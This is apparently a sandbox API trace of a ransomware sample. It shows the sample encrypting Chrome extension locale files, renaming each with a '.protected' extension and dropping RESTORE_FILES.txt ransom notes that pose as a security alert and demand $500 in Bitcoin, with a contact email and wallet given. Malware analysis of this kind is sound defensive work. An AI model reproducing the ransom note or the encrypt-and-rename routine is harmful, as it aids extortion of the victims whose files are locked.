lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.023] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.023] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\..") returned 144 [0080.023] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.023] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.023] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.023] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.023] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.023] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.023] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.023] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json") returned 155 [0080.023] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.023] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.024] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.024] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.024] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.025] CloseHandle (hObject=0x168) returned 1 [0080.025] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected") returned 165 [0080.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.025] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.025] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.025] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0080.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.026] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.026] lstrlenA (lpString="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") returned 684 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.026] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.026] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.026] CloseHandle (hObject=0x164) returned 1 [0080.026] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el") returned 141 [0080.027] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.027] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*") returned 143 [0080.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.027] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\.") returned 143 [0080.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.027] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.027] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\..") returned 144 [0080.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.027] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.027] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.028] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.028] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.028] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json") returned 155 [0080.028] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.028] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0080.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x130, lpOverlapped=0x0) returned 1 [0080.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.029] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.030] CloseHandle (hObject=0x168) returned 1 [0080.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected") returned 165 [0080.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0080.030] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.030] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.030] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0080.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.030] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.031] lstrlenA (lpString="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") returned 684 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.031] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.031] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.032] CloseHandle (hObject=0x164) returned 1 [0080.032] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB") returned 144 [0080.032] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0080.032] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*") returned 146 [0080.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0x47bc10 [0080.032] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\.") returned 146 [0080.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.032] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.032] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.032] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\..") returned 147 [0080.032] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.032] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.033] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 [0080.033] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.033] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.033] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\messages.json") returned 158 